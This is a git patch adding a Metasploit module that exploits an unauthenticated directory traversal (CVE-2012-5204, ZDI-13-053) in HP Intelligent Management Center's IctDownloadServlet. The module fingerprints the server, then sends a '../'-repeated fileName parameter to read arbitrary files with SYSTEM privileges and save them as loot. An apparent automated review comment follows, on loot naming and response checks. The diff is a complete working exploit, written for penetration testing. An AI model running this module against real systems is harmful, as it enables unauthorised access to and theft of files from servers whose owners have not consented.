From 0b4eab2499da42c3a1296d652050aa48b30382e2 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 3 Apr 2013 00:24:11 +0200
Subject: [PATCH] added module for ZDI-13-053
---
 .../hp_imc_ictdownloadservlet_traversal.rb | 100 ++++++++++++++++++
 1 file changed, 100 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
new file mode 100644
index 0000000000..7249f7533b
--- /dev/null
+++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
@@ -0,0 +1,100 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Intelligent Management IctDownloadServlet Directory Traversal',
+ 'Description' => %q{
+ This module exploits a lack of authentication and a directory traversal in HP
+ Intelligent Management, specifically in the IctDownloadServlet, in order to
+ retrieve arbitrary files with SYSTEM privileges. This module has been tested
+ successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rgod ', # Vulnerability Discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-5204' ],
+ [ 'OSVDB', '91029' ],
+ [ 'BID', '58676' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-053/' ]
+ ]
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(8080),
+ OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
+ OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+ # By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
+ OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 7])
+ ], self.class)
+ end
+
+ def is_imc?
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"),
+ 'method' => 'GET'
+ })
+
+ if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+ return true
+ else
+ return false
+ end
+ end
+
+ def run_host(ip)
+
+ if not is_imc?
+ vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+ return
+ end
+
+ travs = ""
+ travs << "../" * datastore['DEPTH']
+ travs << datastore['FILEPATH']
+
+ vprint_status("#{rhost}:#{rport} - Sending request...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "tmp", "ict", "download"),
+ 'method' => 'GET',
+ 'vars_get' =>
+ {
+ 'fileName' => travs
+ }
+ })
+
+ if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
+ contents = res.body
+ fname = File.basename(datastore['FILEPATH'])
+ path = store_loot(
+ 'hp.imc.faultdownloadservlet',
+ 'application/octet-stream',
+ ip,
+ contents,
+ fname
+ )
+ print_good("#{rhost}:#{rport} - File saved in: #{path}")
+ else
+ vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+ return
+ end
+ end
+end
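Review bot: The loot type passed to `store_loot` in run_host, `'hp.imc.faultdownloadservlet'`, names a different servlet than the one this module exploits (the module name, description and the tmp/ict/download request path all say IctDownloadServlet), so files recovered here are filed under a misleading loot type; it should be `'hp.imc.ictdownloadservlet'`. The DEPTH option's help text in initialize, `'Traversal depth if absolute is set to false'`, refers to an `absolute` option that this module never registers, so that text is misleading too; something like `'Traversal depth from the servlet download directory'` matches the comment above it. Separately, the success branch saves `res.body` as loot on any 200 response whose Content-Type is application/doc without checking that the body is non-empty, so if the servlet answers that way for a missing or unreadable file (not verifiable from this diff) an empty loot file would be reported with print_good; adding `and not res.body.empty?` to the condition would avoid that. The exact string match on Content-Type would also miss a value carrying a charset parameter, should the server ever add one.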